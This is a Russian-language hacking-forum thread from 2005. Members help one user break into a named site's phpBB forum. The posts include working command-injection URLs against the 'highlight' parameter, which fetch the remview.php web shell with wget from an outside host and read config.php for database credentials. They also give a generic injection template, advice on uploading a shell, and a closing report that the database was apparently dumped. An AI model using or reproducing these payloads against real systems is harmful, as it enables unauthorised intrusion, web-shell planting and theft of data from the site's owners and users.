ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.12.2005, 19:33
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
$dbpasswd = ''; )\b#i -неправильный пароль
правильно используй узвимость
какой нах неправильный пароль??
Для юзера vscrk его вопще нет.
 
Ответить с цитированием

  #12  
Старый 14.12.2005, 03:23
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723

Репутация: 5
По умолчанию

вот именно. Как не старался пароль вытягивать, видимо база данных без пароля стоит.
Я ТАК думаю что сервак сайта ваще на апаче стоит.



А как подключаться через phpMy Admin ???

Пытаюсь на фтп залазить тоже не получается.
Может можно щелл залить??
v
iewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60 .%2527&ls=wget%20http://xyra.narod.ru/remview.php
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://xyra.narod.ru/remview.php`.%2527
Вот этими пытаюсь нифига не получается.

Короче вот ссылка на форум.
Только пожалуйста не пакостите там, я хочу сам.
Прошу вас.
Вы только помогите мне бд найти.
http://panda.alvisp.ru/pages/forum/viewtopic.php?p=213&highlight=%2527.$poster=%60$ls %60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db

Последний раз редактировалось temon; 14.12.2005 в 03:33..
 
Ответить с цитированием

  #13  
Старый 14.12.2005, 15:44
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
$dbpasswd = '';
Это не кавычка,а 2 апострофа=>пароль для юзера пустой.
Подключись к базе,щас много всяких mysql клиентов.
зы настчет phpmyadmin есть уже тема
 
Ответить с цитированием

  #14  
Старый 15.12.2005, 21:45
Xalegi
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
Провел на форуме:
137630

Репутация: 11
По умолчанию

почитал я туть =)
вот в чём проблема...
правильно начал вроде.
используй &highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ТУ Т_КОМАНДА
в том что у тя не получается залить шелл проверь права папки куда ты пытаешься залить... (следовательно если прав не хватает ставь выставь нужные... chmod 755 papka) (поправте если ошибаюсь) заливаешь шелл...

дык... вообще есть ls -la, cd, шо ещё для счастья нужна? =)
дерзай...

по поводу БД... ммм... как уже заметили есть кууучу клиентов для конекта в БД...
 
Ответить с цитированием

  #15  
Старый 16.12.2005, 10:26
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723

Репутация: 5
По умолчанию

бд уже слили кажется )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41
БАЗА ДАННЫХ azeri_hacker Болталка 5 24.03.2005 21:07
Вопрос про базу данных форума Fagot Форумы 9 07.03.2005 17:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ